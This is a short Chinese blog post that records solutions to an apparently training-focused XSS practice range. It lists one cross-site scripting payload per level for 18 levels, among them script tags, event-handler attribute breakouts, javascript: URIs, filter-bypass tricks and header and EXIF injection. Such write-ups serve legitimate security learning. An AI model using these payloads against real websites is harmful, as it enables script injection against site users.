XSS靶场学习记录
level-1
1 | <script>alert(1)</script> |
level-2
1 | "><script>alert(1)</script><" |
level-3
1 | ' onmousemove='alert(1)' |
level-4
1 | " onmouseover='alert(1)' |
level-5
1 | "><a href="javascript:alert(1);">XSS</a |
level-6
1 | "><a Href="javascript:alert(1);">XSS</a |
level-7
1 | "><scrscriptipt>alert(1)</scrscriptipt><" |
level-8
1 | javascript:alert(1) |
level-9
1 | javascript:alert(1)//http://www.baidu.com |
level-10
1 | 1&t_sort=1" type="text" onmousemove='alert(1)'&t_history=1&t_link=1 |
level-11
第十关结束后抓包改ref请求头
1 | " type='text' onmouseover='alert(1)' |
level-12
第十一关结束后改User-Agent请求头
1 | " type='text' onmouseover='alert(1)' |
level-13
第十二关结束后改cookie请求头
1 | " type="text" onmousemove='alert(1)' |
level-14
exifXSS
1 | 利用exif信息触发xss即可 |
level-15
1 | 'level1.php?name=<script>alert(1)</script>' |
level-16
1 | <img%0Asrc=x%0Aonerror=alert(1)> |
level-17
1 | onmousemove='alert(1)' |
level-18
1 | onmousemove='alert(1)' |
本文作者:
yd0ng
本文链接: https://yd0ng.github.io/2020/02/25/XSS%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://yd0ng.github.io/2020/02/25/XSS%E9%9D%B6%E5%9C%BA%E8%AE%B0%E5%BD%95/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
